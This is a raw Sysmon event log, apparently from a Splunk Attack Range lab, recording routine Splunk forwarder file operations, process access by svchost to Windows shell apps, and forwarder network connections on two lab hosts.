AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A55E9E2794FB8E5F73C105C7F71B11,SHA256=C0C29715654C763BD2D90F33755FA034FC595D6E4A67A519F41E5BFBC950DAF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001094941Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:38.474{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094940Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:38.474{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.906{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.906{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D4257724562023A2520FC663183024,SHA256=4C839DAA453141F66AF7884A07E3283C1B610FC0DD7E5C50E4ECDFDA54B3B79Bfalsefalse - insufficient disk space 23542300x80000000000000001094945Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:39.719{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B534082807419C11D2B114CFD2248A11,SHA256=1B47609C572A0D202C1697C2CB211094154A03294F9E59BB89106DCD78EC6FF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001605980Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:37.668{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49721-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001605979Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45E3CB2CB3E7EAD51870C8DB5C887478,SHA256=D5D6A495B8B87A0879B4C1905C247775CEC1B2998E34AEE0FCF4D12362AF154Bfalsefalse - insufficient disk space 11241100x80000000000000001605977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37351B0ED8339EE76E2E38AC2B9E2508,SHA256=6E7C9BA1DDE2ADA3A21EE016301A42C07461303C47DE57623DA30EEFA8A48E0Cfalsefalse - insufficient disk space 10341000x80000000000000001094944Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:39.475{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094943Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:39.475{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:40.909{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:40.909{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CB9DF3450094279F148C0EAC78741F,SHA256=0B1827E19DAF25BFFAA0B410B1FEE012B66AFC5A34CAA8FC8A1690F9F149B569falsefalse - insufficient disk space 23542300x80000000000000001094951Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.736{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D3BE51A51BB85D7D1CB73315D66D1C5,SHA256=6124A1BC791236ABD6BEEA72D4BBF6E1352BD8C34F0D5EE06B2119095F137C4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001094950Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.845{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1138-false10.0.1.12-8000- 10341000x80000000000000001094949Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094948Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094947Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.250{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=944E80624A16CF2F545DC909D33E85C3,SHA256=05775D01DD39E75611D7D075C4A31BD8DE950979DF2D09CFBBD2A9F7DA357FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094946Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.249{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2512FB71664ABE554C473809A919C797,SHA256=F26D009005934EEA60C522879199BDCC2C0D931DF577F094B9A1EA717844BB0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094954Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.738{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AAED3AD74F9BA0C13013C4E45C81A24,SHA256=DE7ECDFE24CD583273870C0C03E8EA0BF3AF18EC681806F0022DD629E32A46FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001094953Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094952Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094957Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:42.743{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7174CF8821D739FD69BB5BCB674E22,SHA256=73C5EFD8675D99A4E833871E88D13BA5B1D13D404A95B1258C09240C94E325EE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:42.112{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:42.112{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1909C0471892668B3E208F008B6F7B87,SHA256=51194D054091FC3E452E64BFD3E7538479643C399006B20B0223BE55CB584379falsefalse - insufficient disk space 10341000x80000000000000001094956Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:42.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094955Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:42.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094960Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.749{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99982FDA23C3EE1E67D77EA794494C3C,SHA256=9FF4D807CE34C46ABEB58212E77A141F4ABD135CB17DAB9D75099978A711649C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605988Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:43.114{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605987Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:43.114{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B963B5F997621C2FBACE3709AA0B56,SHA256=03C100EC8DB78D0843DF9B5BB39B8009C6001777341F383BED7C1C7C6F984893falsefalse - insufficient disk space 10341000x80000000000000001094959Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.477{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094958Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.477{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094963Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:44.752{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE9D57E50E262D3ACFC1326A5B7B59D,SHA256=64AAD6EE0FBC8721D38229FB29BCB9BC96CD1DCED7A3710E2F34F87C8DB5BF39,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001605995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:42.680{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49722-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001605994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.148{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.148{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C76C5FD297AC99EEA5CA41FDD729B6EE,SHA256=CCA7DF8F878A58E7503969B204DA1E7E4AF547B94DC5093D01E1FB47924C2A3Cfalsefalse - insufficient disk space 10341000x80000000000000001094962Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:44.478{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094961Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:44.478{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86FC26166BC5467851CF946B767AC1D6,SHA256=F4CFAFF7EB271CE1CE37D678C5D9D245AE91F7DD2E92C11EA9B8831DDC1F5DDEfalsefalse - insufficient disk space 11241100x80000000000000001605990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45E3CB2CB3E7EAD51870C8DB5C887478,SHA256=D5D6A495B8B87A0879B4C1905C247775CEC1B2998E34AEE0FCF4D12362AF154Bfalsefalse - insufficient disk space 23542300x80000000000000001094966Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:45.755{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFAACE5E30EA46F31F6BC050F6A9388,SHA256=366C06E12B7E9B963BF9606D0858DAA2B8F69D25D375F093B14DF6503FFF8BD1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605997Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:45.184{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605996Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:45.184{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E789567BA3133923C67A14BB73F4C1B5,SHA256=6732104CA4AAC9CF7CD252BFABC26351EF362274BB0B41A30632B1BE08FBB92Afalsefalse - insufficient disk space 10341000x80000000000000001094965Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:45.479{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094964Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 